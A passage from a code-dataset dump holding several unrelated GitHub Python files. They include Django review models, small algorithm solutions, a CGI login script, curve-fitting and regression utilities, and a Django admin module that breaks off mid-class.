__str__(self):\n return (\n self.name[:TRUNCATE_LENGTH] + '...'\n if len(self.name) > TRUNCATE_LENGTH\n else self.name\n )\n\n\nclass Review(models.Model):\n \"\"\"Отзывы\"\"\"\n\n title = models.ForeignKey(\n Title,\n on_delete=models.CASCADE,\n related_name='reviews',\n verbose_name='произведение',\n )\n author = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='reviews',\n verbose_name='автор',\n )\n text = models.TextField('текст')\n score = models.IntegerField(\n 'оценка',\n validators=(MinValueValidator(1), MaxValueValidator(10)),\n error_messages={'validators': 'О��енка только от 1 до 10'},\n )\n pub_date = models.DateTimeField(\n 'дата публикации',\n auto_now_add=True,\n db_index=True,\n )\n\n class Meta:\n verbose_name = 'отзыв'\n verbose_name_plural = 'отзывы'\n ordering = ('-pub_date',)\n constraints = [\n models.UniqueConstraint(\n # Ограничение: один отзыв на одно произведение\n fields=(\n 'title',\n 'author',\n ),\n name='unique review',\n ),\n ]\n\n def __str__(self):\n return (\n self.text[:TRUNCATE_LENGTH] + '...'\n if len(self.text) > TRUNCATE_LENGTH\n else self.text\n )\n\n\nclass Comment(models.Model):\n review = models.ForeignKey(\n Review,\n on_delete=models.CASCADE,\n related_name='comments',\n verbose_name='отзыв',\n )\n author = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='comments',\n verbose_name='автор',\n )\n text = models.TextField('текст комментария')\n pub_date = models.DateTimeField(\n 'дата публикации',\n auto_now_add=True,\n db_index=True,\n )\n\n class Meta:\n verbose_name = 'комментарий'\n verbose_name_plural = 'комментарии'\n ordering = ('-pub_date',)\n\n def __str__(self):\n return (\n self.text[:TRUNCATE_LENGTH] + '...'\n if len(self.text) > TRUNCATE_LENGTH\n else self.text\n )\n","repo_name":"DeVarlamov/on-the-wall","sub_path":"api_yamdb/reviews/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4828,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27271633160","text":"#영화감독 숌\n'''\n666은 종말을 나타내는 숫자라고 함\n\n영화감독 숌은 세상의 종말이라는 시리즈 영화의 감독\n\n종말의 숫자란 어떤 수에 6이 적어도 3개이상 연속으로 들어가는 수를 말한다\n제일 작은 종말의 숫자는 666이고 그 다음으로 큰수는 1666,2666....과 같다\n\n따라서 숌은 첫번째 영화의 제목은 세상의 종말 666, 두번째 영화는 세상의 종말 1666\n이렇게 이름을 지을 것이다. 일반화 해서 생각하면 N번째 영화의 제목은 세상의 종말 (N번째로 작은 종말의 숫자)와\n같다.\n\n숌이 만든 N번째 영화의 제목에 들어간 숫자를 출력하는 프로그램을 작성하시오\n'''\n\n#입력\nN=int(input())\nindex_=1\nfor i in range(10000000):\n if \"666\" in str(i) :\n if(index_==N):\n print(i)\n break\n index_+=1\n#맞추기는 했으나 규칙 찾아서 다시 풀어보자","repo_name":"mseo39/python","sub_path":"python_algorithm/step11/1436.py","file_name":"1436.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33450767538","text":"class UnionFind():\n def __init__(self) -> None:\n self.root = {chr(i):chr(i) for i in range(97,123)}\n \n\n def find(self, x):\n if self.root[x] != x:\n self.root[x] = self.find(self.root[x])\n return self.root[x]\n \n def union(self,x,y):\n repX = self.find(x)\n repY = self.find(y)\n\n if repX != repY:\n \n if ord(repX) < ord(repY):\n self.root[repY] = repX\n \n else:\n self.root[repX] = repY\n \n\n\n def connected(self,x,y):\n return self.find(x) == self.find(y)\n \n def get(self):\n return self.root\n \n \nclass Solution:\n def smallestEquivalentString(self, s1: str, s2: str, baseStr: str) -> str:\n rep = UnionFind()\n \n for ind in range(len(s1)):\n x = s1[ind]\n y = s2[ind]\n rep.union(x,y)\n \n ans = []\n root = rep.get()\n \n # print(root)\n for char in baseStr:\n ans.append(rep.find(char))\n \n # print(\">> \", ans)\n\n \n return \"\".join(ans)\n \n \n \n ","repo_name":"yonasengdu/Compitative-programming","sub_path":"1061-lexicographically-smallest-equivalent-string/1061-lexicographically-smallest-equivalent-string.py","file_name":"1061-lexicographically-smallest-equivalent-string.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"6324191530","text":"import cgi\nimport sys\nimport os\nsys.path.append(os.getcwd()) # 将当前项目目录添加到模块的扫描路径中\nfrom com.aowin.dao import LoginDao\nimport http.cookies\n\n# 获取数据\nfield = cgi.FieldStorage() # 从客户端提交的所有数据\nusername = field.getvalue(\"username\")\nuserpwd = field.getvalue(\"userpwd\")\n\n# 查询数据库\ntry:\n login = LoginDao.login(username, userpwd)\n if login:\n result = \"success\"\n else:\n result = \"fail\"\nexcept:\n result = \"error\"\n\n# 响应\nprint('access-control-allow-origin: *')\nprint(\"\")\nprint(result, end=\"\")\n\n","repo_name":"huiba7i/Mycode","sub_path":"python/item/myWeb/cgi-bin/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16597583978","text":"# use OS for file IO and the like\nimport os\n# use numpy for array operations\nimport numpy as np\n# Use CSV for writing human readable files\nimport csv\nfrom scipy.optimize import curve_fit\n# path!\nimport ntpath\n# for argument parsing easily\nimport argparse\n# for getting formatted times\nimport time\nfrom scipy.optimize import basinhopping\n\n\n# Stats\ndef RSQ(predicted,actual):\n # given predicted and actual values, get the RSQ\n meanObs = np.mean(actual)\n SS_Res = np.sum((predicted-actual)**2)\n SS_Tot = np.sum((actual-meanObs)**2)\n return 1 - SS_Res/SS_Tot\n\ndef lineIntersect(slope1,intercept1,slope2,intercept2):\n return (intercept1-intercept2)/(slope2-slope1)\n\n# assumes that aThenBX are lists for the two lines\ndef lineIntersectParam(aThenB1,aThenB2):\n return lineIntersect(aThenB1[0],aThenB1[1],aThenB2[0],aThenB2[1])\n\ndef linModel(xData,a,b):\n # y = ax+b\n return xData*a+b\n\ndef GenFit(x,y,model=linModel,**kwargs):\n params,Cov = curve_fit(f=model,xdata=x,ydata=y,**kwargs)\n # the square root of the diagonal elements are the standard deviations\n paramsStd = np.sqrt(np.diag(Cov))\n predicted = model(x,*params)\n return params,paramsStd,predicted\n\ndef fitInfo(x,y,units=['',''],model=linModel,varStr=['a','b'],\n modelStr=\"y=a*x+b\"\n ,degFit=1,fmtStr=\".3g\",full=False,simplify=True,**kwargs):\n # get all the information you could want about the fit.\n # XXX TODO: add in support for non linear models.\n # x: observed x\n # y: observed y\n # units: units of the variables in varStr\n # varStr: parameters of the fit. goes from high degree to low \n # modelStr: describing the model.\n # degFit: degree of the model\n # fmtStr: formating of the data\n # full : if we should return all the data\n params,paramsStd,predicted = GenFit(x,y,model,**kwargs)\n R_SQ = RSQ(predicted,y)\n # if RSQ is very close to 1 (XXX add parameter?) don't display, since\n # we are likely not interested in an actual fit...\n if (not simplify or (R_SQ-1) > 1.e-6):\n modelStr += \"\\nRSQ: {:.3f}\".format(R_SQ)\n for label,mean,stdev,unitTmp in zip(varStr,params,paramsStd,units):\n tempMStr = (\"\\n{:5s}={:\" + fmtStr + \"}\").format(label,mean)\n # if either in range or told not to simplify, add the stdev\n if (not (np.isfinite(stdev) or stdev<0 or stdev == float('inf'))\n or not simplify):\n tempMStr += \"+/-{:.1g}\".format(stdev)\n modelStr += tempMStr\n # add the units (if we have any)\n if (len(unitTmp) > 0):\n modelStr += \"[{:s}]\".format(unitTmp)\n if (full):\n return predicted,modelStr,params,paramsStd,RSQ\n else:\n return predicted,modelStr\n\n\ndef TaylorSeries(x,y,deg=1,ZeroX=False,ZeroY=False,**kwargs):\n \"\"\"\n Args:\n x: x to fit\n y: y to fit\n deg: degree of the fit\n ZeroX: if true, offsets the series so that x[0] -> 0\n ZeroY: if true, offsets the series so that y[0] -> 0\n Returns:\n return of polyfit\n \"\"\"\n offsetX = x[0] if ZeroX else 0\n offsetY = y[0] if ZeroY else 0\n return np.polyfit(x-offsetX,y-offsetY,deg=deg)\n\n\ndef BasinHop(funcToMinimize,x0,boundsBasin,method=\"TNC\",disp=False,\n interval=10,niter=30,niter_success=10,T=1,stepsize=0.001,\n ftol=1e-3,xtol=1e-3,gtol=1e-3):\n \"\"\"\n Returns the result of basin hopping, given the arguments:\n\n Args:\n funcToMinimize: function to minimize, should take in the parameters\n as described by scipy's basinhopping routine\n \n x0: initial guessses, one per minimizer\n \n boundsBasin: the bounds, same size as x0. open ends of intervals are \n None\n\n all others: consult basinhopping function\n \"\"\"\n # the minimizer itself (for each 'basin') takes keywords\n # here, we are a little less 'picky' about the function tolerances\n # than before\n minimizer_kwargs = dict(method=method,bounds=boundsBasin,\n options=dict(ftol=ftol,xtol=xtol,gtol=gtol))\n # use basin-hopping to get a solid guess of where we should start\n obj = basinhopping(funcToMinimize,x0=x0,disp=disp,T=T,\n stepsize=stepsize,minimizer_kwargs=minimizer_kwargs,\n niter_success=niter_success,interval=interval,\n niter=niter)\n return obj\n","repo_name":"prheenan/BioModel","sub_path":"FitUtils/Python/FitUtil.py","file_name":"FitUtil.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18948200256","text":"from sklearn.datasets import load_boston\nfrom sklearn.linear_model import LinearRegression, SGDRegressor\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef mylinear():\n lb = load_boston()\n # print(lb.DESCR)\n x_train, x_test, y_train, y_test = train_test_split(lb.data, lb.target, test_size=0.25)\n\n # print(x_train)\n # print(x_test)\n std_x = StandardScaler()\n\n x_train = std_x.fit_transform(x_train)\n x_test = std_x.fit_transform(x_test)\n\n std_y=StandardScaler()\n\n y_train = std_y.fit_transform(y_train.reshape(-1,1))\n y_test = std_y.fit_transform(y_test.reshape(-1, 1))\n\n lr= LinearRegression()\n lr.fit(x_train,y_train)\n print(lr.coef_)\n\n y_predict=std_y.inverse_transform(lr.predict(x_test))\n print('ceshijiage',y_predict)\n\n return None\n\n\nif __name__ == \"__main__\":\n mylinear()\n#","repo_name":"jieye-ericx/learn-python","sub_path":"22/my/03.py","file_name":"03.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3611140978","text":"from app.views import mobile\n\nMOBILE_ROUTES = (\n (mobile.index, '/mobile'),\n (mobile.category, '/mobile/category'),\n (mobile.cart, '/mobile/cart'),\n (mobile.item, '/mobile/item'),\n (mobile.comment, '/mobile/comment'),\n (mobile.pay, '/mobile/pay'),\n (mobile.wallet, '/mobile/wallet'),\n (mobile.order, '/mobile/order'),\n (mobile.aftersales, '/mobile/aftersales'),\n (mobile.me, '/mobile/me')\n)\n","repo_name":"kapokcloud-inc/theonestore","sub_path":"app/routes/mobile.py","file_name":"mobile.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"61"} +{"seq_id":"17130873787","text":"import matplotlib.pyplot as plt\r\nimport matplotlib.ticker as ticker\r\nfrom AE_ModelConstruction import *\r\nBATCH_SIZE2 = 60\r\nthreshold=0.7845413302380952\r\nlayer=2\r\ninput_num=14\r\n\r\nname_list=['ae_D0_temp','ae_D1_temp','ae_D2_temp']#数据文件名\r\nnp_D,np_Dmax,np_Dmin=Traindata(name_list)#加载训练集\r\n\r\n#选择测试集还是验证集\r\n# dict_Kobs=io.loadmat('ae_Kobs3_temp') #测试集\r\n# np_Kobs=dict_Kobs['ae_Kobs2']\r\ndict_Kobs=io.loadmat('ae_ver_temp') #验证集\r\nnp_Kobs=dict_Kobs['ae_ver_temp']\r\n\r\nnp_Kobs=np_Kobs[:,4:]\r\nnp_Kobs=(np_Kobs-np_Dmin)/(np_Dmax-np_Dmin)\r\nKobs_num=np.size(np_Kobs,axis=0)\r\n\r\ntorch_Kobs=torch.from_numpy(np_Kobs).float()\r\nprint(torch_Kobs.shape)\r\ntest_loader = Data.DataLoader(dataset=torch_Kobs, batch_size=BATCH_SIZE2, shuffle=False)\r\n\r\nlayer_index=[2,3]\r\nmaxerror=[]\r\nmeanerror=[]\r\nsims=[]\r\nfor step,layer in enumerate(layer_index):\r\n ae_test=autoencoder(input_num,layer,batch_normalization=True)\r\n namestr = 'ae_withBN_' + '%d' % layer + '.pkl'#神经网络命名规则:withBN代表包含BN层,_layer代表网络层数\r\n ae_test = torch.load(namestr)#加载神经网络\r\n test_Kobs=np.zeros((1,14))\r\n ae_test.eval()#测试状态\r\n for step,s in enumerate(test_loader):\r\n test_enc,test_dec=ae_test(s)\r\n #反归一化\r\n np_dec=test_dec.data.numpy()\r\n np_dec=np_dec*(np_Dmax-np_Dmin)+np_Dmin\r\n test_Kobs=np.vstack((test_Kobs,np_dec))\r\n test_Kobs=np.delete(test_Kobs,0,axis=0)\r\n np_Kobs = np_Kobs * (np_Dmax - np_Dmin) + np_Dmin#反归一化\r\n #各变量图片\r\n plt.rcParams['font.sans-serif']=['SimHei']#图片显示中文\r\n plt.rcParams['axes.unicode_minus'] = False\r\n label=['风粉混合物温度/℃','反作用力加载油压/MPa',\r\n '加载油压/MPa','磨煤机电流/A','一次风压力/kPa','密封风母管压力/kPa','一次风与密封风差压/kPa',\r\n '出入口差压/kPa','油箱油温/℃','一次风流量/t·h-1','轴承温度/℃','推力瓦温/℃','油池油温/℃','实际功率/MW']\r\n e=np.ones((Kobs_num,14))\r\n maxe=np.ones((1,14))\r\n meane=np.ones((1,14))\r\n for j in range(14):\r\n plt.subplot(211)\r\n plt.gca().yaxis.set_major_formatter(ticker.FormatStrFormatter('%.1f'))\r\n plt.plot(np_Kobs[:, j],'steelblue',label='观测值',lw=1.5)\r\n plt.plot(test_Kobs[:, j],'indianred',label='重构值',lw=1.5)\r\n plt.legend(loc='upper right',fontsize=13)\r\n plt.xlabel('样本序号',fontsize=20)\r\n plt.ylabel(label[j],fontsize=20,verticalalignment='bottom')\r\n plt.xticks(fontsize=20)\r\n plt.yticks(fontsize=20)\r\n plt.subplot(212)\r\n plt.gca().yaxis.set_major_formatter(ticker.FormatStrFormatter('%.1f'))\r\n e[:,j]=((np_Kobs[:, j] - test_Kobs[:, j]) / np_Kobs[:, j])*100\r\n maxe[:,j]=np.max(abs(e[:,j]))\r\n meane[:,j] = np.mean(abs(e[:, j]))\r\n plt.plot(e[:,j],'peru',lw=1)#偏离度\r\n plt.xlabel('样本序号', fontsize=20)\r\n plt.ylabel('相对误差/%',fontsize=20)\r\n plt.xticks(fontsize=20)\r\n plt.yticks(fontsize=18)\r\n plt.show()\r\n np.set_printoptions(formatter={'float': '{: 0.4f}'.format})\r\n maxerror.append(maxe)\r\n meanerror.append(meane)\r\n #观测值与估计值的欧式距离\r\n np_Kobs = (np_Kobs - np_Dmin) / (np_Dmax - np_Dmin)\r\n test_Kobs = (test_Kobs - np_Dmin) / (np_Dmax - np_Dmin)\r\n dist_norm=[]\r\n for i in range(Kobs_num):\r\n dist_norm.append(np.linalg.norm( np_Kobs[i,:] - test_Kobs[i,:] ))\r\n dist_norm_arr=np.array(dist_norm,dtype=float)#欧式距离\r\n #观测值与估计值的余弦距离\r\n dist_cos=[]\r\n for i in range(Kobs_num):\r\n dist_cos.append(np.dot(np_Kobs[i, :], test_Kobs[i, :]) /\r\n (np.linalg.norm(np_Kobs[i, :]) * np.linalg.norm(\r\n test_Kobs[i, :] )))#dot向量内积,norm向量二范数\r\n dist_cos_arr=(np.array(dist_cos, dtype=float) * 0.5 + 0.5)#余弦距离\r\n #阈值\r\n sim=(1/(1+dist_norm_arr/dist_cos_arr))#相似度\r\n sims.append(sim)\r\n # threshold=np.min(sim)*0.98 #验证时注释\r\n # print('threshold=',threshold)\r\n\r\n#将不同层数的神经网络模型的估计效果在同一个图中展示:\r\nfor step,layer in enumerate(layer_index):\r\n plt.plot(maxerror[step].reshape((14,)),lw=0.8,label='ae_withBN_' + '%d' % layer)\r\nplt.legend(loc='upper left', fontsize=12)\r\nplt.xlabel('变量序号', fontsize=18)\r\nplt.ylabel('最大相对误差', fontsize=18)\r\nplt.show()\r\nfor step,layer in enumerate(layer_index):\r\n plt.plot(meanerror[step].reshape((14,)),lw=0.8,label='ae_withBN_' + '%d' % layer)\r\nplt.legend(loc='upper left', fontsize=12)\r\nplt.xlabel('变量序号', fontsize=18)\r\nplt.ylabel('平均相对误差', fontsize=18)\r\nplt.show()\r\nfor step,layer in enumerate(layer_index):\r\n plt.plot(sims[step].reshape((Kobs_num,)), lw=0.8, label='ae_withBN_' + '%d' % layer)\r\nplt.legend(loc='lower left', fontsize=12)\r\nplt.xlabel('样本序号',fontsize=18)\r\nplt.ylabel('相似度',fontsize=18)\r\nplt.ylim((0, 1))\r\nplt.show()","repo_name":"xiaobinbin0827/SAE_pytorch","sub_path":"AE_Test.py","file_name":"AE_Test.py","file_ext":"py","file_size_in_byte":5075,"program_lang":"python","lang":"zh","doc_type":"code","stars":12,"dataset":"github-code","pt":"61"} +{"seq_id":"3345592314","text":"from butler_offline.viewcore import viewcore\nfrom butler_offline.viewcore.viewcore import post_action_is\nfrom butler_offline.viewcore.converter import from_double_to_german, datum, datum_to_string, datum_to_german\nfrom butler_offline.viewcore import request_handler\nfrom butler_offline.viewcore.state import non_persisted_state\nfrom butler_offline.viewcore.context.builder import generate_transactional_page_context\nfrom butler_offline.viewcore.template import fa\nfrom butler_offline.core.database.gemeinsamebuchungen import Gemeinsamebuchungen\nfrom typing import List\nimport logging\n\n\nclass AddGemeinsameBuchungContext:\n def __init__(self,\n gemeinsame_buchungen: Gemeinsamebuchungen,\n partner_name: str,\n database_name: str,\n kategorien: List[str]):\n self._gemeinsame_buchungen = gemeinsame_buchungen\n self._partner_name = partner_name\n self._database_name = database_name\n self._kategorien = kategorien\n\n def gemeinsame_buchungen(self) -> Gemeinsamebuchungen:\n return self._gemeinsame_buchungen\n\n def partner_name(self) -> str:\n return self._partner_name\n\n def kategorien(self) -> List[str]:\n return self._kategorien\n\n def database_name(self) -> str:\n return self._database_name\n\n\ndef handle_request(request, context: AddGemeinsameBuchungContext):\n if post_action_is(request, 'add'):\n date = datum(request.values['date'])\n value = request.values['wert'].replace(\",\", \".\")\n value = float(value)\n value = value * -1\n if \"edit_index\" in request.values:\n context.gemeinsame_buchungen().edit(int(request.values['edit_index']),\n datum=date,\n name=str(request.values['name']),\n kategorie=request.values['kategorie'],\n wert=value,\n person=request.values['person']\n )\n non_persisted_state.add_changed_gemeinsamebuchungen(\n {\n 'fa': fa.pencil,\n 'datum': datum_to_german(date),\n 'kategorie': request.values['kategorie'],\n 'name': request.values['name'],\n 'wert': from_double_to_german(value),\n 'person': request.values['person']\n })\n\n else:\n context.gemeinsame_buchungen().add(ausgaben_datum=date,\n kategorie=request.values['kategorie'],\n ausgaben_name=request.values['name'],\n wert=\"%.2f\" % value,\n person=request.values['person'])\n non_persisted_state.add_changed_gemeinsamebuchungen(\n {\n 'fa': fa.plus,\n 'datum': datum_to_german(date),\n 'kategorie': request.values['kategorie'],\n 'name': request.values['name'],\n 'wert': from_double_to_german(value),\n 'person': request.values['person']\n })\n\n result_context = generate_transactional_page_context(\"addgemeinsam\")\n result_context.add('approve_title', 'Gemeinsame Ausgabe hinzufügen')\n if post_action_is(request, 'edit'):\n logging.info('Please edit: %s', request.values['edit_index'])\n db_index = int(request.values['edit_index'])\n db_row = context.gemeinsame_buchungen().get(db_index)\n default_item = {\n 'edit_index': str(db_index),\n 'datum': datum_to_string(db_row['Datum']),\n 'name': db_row['Name'],\n 'wert': from_double_to_german(db_row['Wert'] * -1),\n 'kategorie': db_row['Kategorie'],\n 'person': db_row['Person']\n }\n\n result_context.add('default_item', default_item)\n result_context.add('bearbeitungsmodus', True)\n result_context.add('edit_index', db_index)\n result_context.add('approve_title', 'Gemeinsame Ausgabe aktualisieren')\n\n if not result_context.contains('default_item'):\n result_context.add('default_item', {\n 'name': '',\n 'wert': '',\n 'datum': ''\n })\n\n result_context.add('personen', [context.database_name(), context.partner_name()])\n result_context.add('kategorien', sorted(context.kategorien()))\n result_context.add('letzte_erfassung', reversed(non_persisted_state.get_changed_gemeinsamebuchungen()))\n return result_context\n\n\ndef index(request):\n return request_handler.handle(\n request=request,\n handle_function=handle_request,\n html_base_page='gemeinsame_buchungen/addgemeinsam.html',\n context_creator=lambda db: AddGemeinsameBuchungContext(\n gemeinsame_buchungen=db.gemeinsamebuchungen,\n database_name=db.name,\n kategorien=db.einzelbuchungen.get_kategorien_ausgaben(hide_ausgeschlossene_kategorien=True),\n partner_name=viewcore.name_of_partner()\n )\n )\n","repo_name":"SebastianRzk/BudgetButlerWeb","sub_path":"butler_offline/views/gemeinsame_buchungen/addgemeinsam.py","file_name":"addgemeinsam.py","file_ext":"py","file_size_in_byte":5280,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"30649345110","text":"from nltk.metrics import *\n\n\ndef withMinEditDist(word, list):\n if len(list) >0:\n suitableWord = list[0]\n\n for item in list:\n if edit_distance(word, suitableWord) > edit_distance(word, item):\n suitableWord = item\n return suitableWord\n else:\n return word\n\n\n\nprint(withMinEditDist('r00m', ['room', 'booking', 'hotel', 'customer']))\n\n\n","repo_name":"amilacjay/isyntax","sub_path":"sketchquery/test/nltk/minEditDist.py","file_name":"minEditDist.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16818739700","text":"from datetime import datetime\n\nfrom django.contrib import admin, messages\nfrom django import forms\nfrom django.forms import ModelForm\nfrom django.contrib.auth import admin as auth_admin\nfrom django.contrib.flatpages.models import FlatPage\nfrom django.contrib.flatpages.admin import FlatPageAdmin, FlatpageForm\nfrom django.utils.safestring import mark_safe\nfrom django.conf.urls import url\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\n\nfrom codemirror import CodeMirrorTextarea\nfrom suit.admin import SortableModelAdmin\n\nfrom .forms import (\n UserChangeForm, UserCreationForm, UserLimitedChangeForm, AddOrganizerForm\n)\nfrom .filters import OpenRegistrationFilter\nfrom .models import (\n Coach, Event, User, EventPage, EventPageContent, EventPageMenu, Postmortem,\n Sponsor, Story\n)\n\n\nclass EventAdmin(admin.ModelAdmin):\n list_display = ('name', 'organizers', 'email', 'date', 'city', 'country',\n 'is_on_homepage', 'is_past_event', 'has_stats')\n list_filter = (OpenRegistrationFilter,)\n search_fields = ('city', 'country', 'name')\n filter_horizontal = ['team']\n\n def get_queryset(self, request):\n qs = super(EventAdmin, self).get_queryset(request)\n if request.user.is_superuser:\n return qs\n return qs.filter(team=request.user)\n\n def is_past_event(self, obj):\n return not obj.is_upcoming()\n is_past_event.boolean = True\n\n def has_stats(self, obj):\n return Postmortem.objects.filter(event=obj).exists()\n has_stats.boolean = True\n\n def get_readonly_fields(self, request, obj=None):\n if obj and not request.user.is_superuser:\n return ('email', 'team', 'is_deleted', 'is_on_homepage')\n return self.readonly_fields\n\n def get_urls(self):\n urls = super(EventAdmin, self).get_urls()\n my_urls = [\n url(r'manage_organizers/$',\n self.admin_site.admin_view(self.view_manage_organizers),\n name='core_event_manage_organizers'),\n url(r'add_organizers/$',\n self.admin_site.admin_view(self.view_add_organizers),\n name='core_event_add_organizers'),\n ]\n return my_urls + urls\n\n def _get_future_events_for_user(self, request):\n \"\"\"\n Retrieves a list of future events, ordered by name.\n It's based on get_queryset, so superuser see all events, while\n is_staff users see events they're assigned to only.\n \"\"\"\n return self.get_queryset(request) \\\n .filter(date__gte=datetime.now()\n .strftime(\"%Y-%m-%d\")).order_by('name')\n\n def _get_event_from_get(self, request, all_events):\n \"\"\"\n Retrieves a particular event from request.GET['event_id'], or\n returns the first one from all events available to the user.\n \"\"\"\n if 'event_id' in request.GET:\n try:\n return all_events.get(id=request.GET['event_id'])\n except Event.DoesNotExist:\n pass\n else:\n return all_events.first()\n\n def view_manage_organizers(self, request):\n \"\"\"\n Custom admin view that allows user to remove organizers from an event\n \"\"\"\n all_events = self._get_future_events_for_user(request)\n event = self._get_event_from_get(request, all_events)\n\n if 'remove' in request.GET and event in all_events:\n user = User.objects.get(id=request.GET['remove'])\n if user == request.user:\n messages.error(request, 'You cannot remove yourself from a team.')\n else:\n if user in event.team.all():\n event.team.remove(user)\n messages.success(request, 'Organizer {} has been removed'.format(user.get_full_name()))\n return HttpResponseRedirect(\n reverse('admin:core_event_manage_organizers') + '?event_id={}'.format(event.id))\n\n return render(request, 'admin/core/event/view_manage_organizers.html', {\n 'all_events': all_events,\n 'event': event,\n 'title': 'Remove organizers',\n })\n\n def view_add_organizers(self, request):\n \"\"\"\n Custom admin view that allows user to add new organizer to an event\n \"\"\"\n all_events = self._get_future_events_for_user(request)\n event = self._get_event_from_get(request, all_events)\n\n if request.method == 'POST':\n form = AddOrganizerForm(all_events, request.POST)\n if form.is_valid():\n user = form.save()\n messages.success(request,\n \"{} has been added to your event, yay! They've been also\" \\\n \" invited to Slack and should receive credentials to login\" \\\n \" in an e-mail.\".format(user.get_full_name()))\n return redirect('admin:core_event_add_organizers')\n else:\n form = AddOrganizerForm(all_events)\n\n return render(request, 'admin/core/event/view_add_organizers.html', {\n 'all_events': all_events,\n 'event': event,\n 'form': form,\n 'title': 'Add organizers',\n })\n\n\nclass EventPageAdmin(admin.ModelAdmin):\n list_display = ('title', 'event', 'is_live')\n search_fields = ('title', 'event__name', 'event__city', 'event__country')\n\n def get_queryset(self, request):\n qs = super(EventPageAdmin, self).get_queryset(request)\n if request.user.is_superuser:\n return qs\n return qs.filter(event__team=request.user)\n\n def get_readonly_fields(self, request, obj=None):\n if obj and not request.user.is_superuser:\n # Don't let change objects for events that already happened\n if not obj.event.is_upcoming():\n return set([x.name for x in self.model._meta.fields])\n else:\n return ('url', 'is_deleted')\n return self.readonly_fields\n\n\nclass ResizableCodeMirror(CodeMirrorTextarea):\n\n def __init__(self, **kwargs):\n super(ResizableCodeMirror, self).__init__(\n js_var_format='%s_editor', **kwargs)\n\n @property\n def media(self):\n mine = forms.Media(\n css={'all': ('vendor/jquery-ui/jquery-ui.min.css',)},\n js=('vendor/jquery-ui/jquery-ui.min.js',))\n return super(ResizableCodeMirror, self).media + mine\n\n def render(self, name, value, attrs=None):\n output = super(ResizableCodeMirror, self).render(name, value, attrs)\n return output + mark_safe(\n '''\n \n ''' % name)\n\n\nclass EventPageContentForm(ModelForm):\n\n class Meta:\n widgets = {\n 'content': ResizableCodeMirror(mode=\"xml\")\n }\n fields = (\n 'page',\n 'name',\n 'content',\n 'background',\n 'position',\n 'is_public',\n )\n\n\nclass SponsorInline(admin.TabularInline):\n model = EventPageContent.sponsors.through\n extra = 1\n verbose_name_plural = 'Sponsors'\n\n\nclass CoachInline(admin.TabularInline):\n model = EventPageContent.coaches.through\n extra = 1\n verbose_name_plural = 'Coaches'\n\n\nclass EventPageContentAdmin(SortableModelAdmin):\n list_display = ('name', 'page', 'position', 'is_public')\n list_filter = ('page', 'is_public')\n search_fields = ('name', 'page__title', 'content', 'page__event__city',\n 'page__event__country', 'page__event__name')\n form = EventPageContentForm\n sortable = 'position'\n inlines = [\n SponsorInline,\n CoachInline\n ]\n\n def get_queryset(self, request):\n qs = super(EventPageContentAdmin, self).get_queryset(request)\n if request.user.is_superuser:\n return qs\n return qs.filter(page__event__team=request.user)\n\n def get_form(self, request, obj=None, **kwargs):\n form = super(EventPageContentAdmin, self).get_form(\n request, obj, **kwargs)\n if not request.user.is_superuser:\n if 'page' in form.base_fields:\n form.base_fields['page'].queryset = EventPage.objects.filter(\n event__team=request.user\n )\n return form\n\n def get_readonly_fields(self, request, obj=None):\n if obj and not request.user.is_superuser:\n # Don't let change objects for events that already happened\n if not obj.page.event.is_upcoming():\n return set([x.name for x in self.model._meta.fields])\n return self.readonly_fields\n\n\nclass EventPageMenuAdmin(SortableModelAdmin):\n list_display = ('title', 'page', 'url', 'position')\n list_filter = ('page',)\n sortable = 'position'\n\n def get_queryset(self, request):\n qs = super(EventPageMenuAdmin, self).get_queryset(request)\n if request.user.is_superuser:\n return qs\n return qs.filter(page__event__team=request.user)\n\n def get_form(self, request, obj=None, **kwargs):\n form = super(EventPageMenuAdmin, self).get_form(request, obj, **kwargs)\n if not request.user.is_superuser:\n if 'page' in form.base_fields:\n form.base_fields['page'].queryset = EventPage.objects.filter(\n event__team=request.user\n )\n return form\n\n def get_readonly_fields(self, request, obj=None):\n if obj and not request.user.is_superuser:\n # Don't let change objects for events that already happened\n if not obj.page.event.is_upcoming():\n return set([x.name for x in self.model._meta.fields])\n return self.readonly_fields\n\n\nclass SponsorAdmin(admin.ModelAdmin):\n list_display = ('id', 'name', 'logo_display_for_admin', 'url')\n list_per_page = 50\n search_fields = ('name', )\n\n def get_queryset(self, request):\n qs = super(SponsorAdmin, self).get_queryset(request)\n if request.user.is_superuser:\n return qs\n return qs.filter(eventpagecontent__page__event__team=request.user).distinct()\n\n def get_form(self, request, obj=None, **kwargs):\n form = super(SponsorAdmin, self).get_form(request, obj, **kwargs)\n if not request.user.is_superuser:\n if 'eventpagecontent' in form.base_fields:\n qs = EventPageContent.objects.filter(\n page__event__team=request.user)\n form.base_fields['eventpagecontent'].queryset = qs\n return form\n\n\nclass CoachAdmin(admin.ModelAdmin):\n list_display = ('name', 'photo_display_for_admin', 'twitter_handle', 'url')\n search_fields = ('name', 'twitter_handle', 'url')\n\n def get_queryset(self, request):\n qs = super(CoachAdmin, 